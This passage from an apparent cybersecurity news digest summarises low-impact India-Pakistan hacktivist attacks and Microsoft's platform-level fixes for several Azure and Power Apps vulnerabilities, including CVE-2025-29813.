However, detailed technical investigations revealed that the actual impact of these attacks on Indian cyber assets was minimal. Claims of major data breaches, such as a supposed 247 GB breach of the National Informatics Centre (NIC), were largely unfounded as the data was publicly available or fabricated. Website defacements and Distributed Denial of Service (DDoS) attacks, while numerous, were short-lived and ineffective. Despite the relatively low impact, the cyberattacks highlighted the ongoing tensions in cyberspace between India and Pakistan. Technisanct identified 36 pro-Pakistan hacktivist groups involved in the digital assaults, countered by 14 Indian groups retaliating. The escalation in hacktivist activity serves as a reminder of the persistent and evolving cyber threats facing both nations, even amidst military tensions. Recommended read:
References :
@securityonline.info
//
Microsoft has recently addressed several critical security vulnerabilities affecting its Azure cloud services and Microsoft Power Apps. The flaws, identified in Azure Automation, Azure Storage, Azure DevOps, and Microsoft Power Apps, highlighted the importance of proactive security measures within cloud-native development environments. One vulnerability, CVE-2025-29813, received the maximum Common Vulnerability Scoring System (CVSS) score of 10, indicating its severity.
The most critical vulnerability, found in Azure DevOps, allowed attackers with project-level access to escalate their privileges by exchanging short-term pipeline job tokens for long-term ones, potentially gaining extensive access within a project environment. Additional vulnerabilities included CVE-2025-29827 in Azure Automation, where improper authorization could enable a user to elevate privileges, CVE-2025-29972, an SSRF vulnerability in Azure Storage Resource Provider, and CVE-2025-47733 in Microsoft Power Apps, which allowed unauthorized information disclosure over a network through a Server-Side Request Forgery (SSRF). Despite the severity of these vulnerabilities, Microsoft has assured users that no action is required on their part. The company has already mitigated the flaws at the platform level, preventing potential exploitation. These patches underscore Microsoft's commitment to maintaining a secure cloud environment and highlight the ongoing need for robust security practices within cloud-native development. Recommended read:
References :
|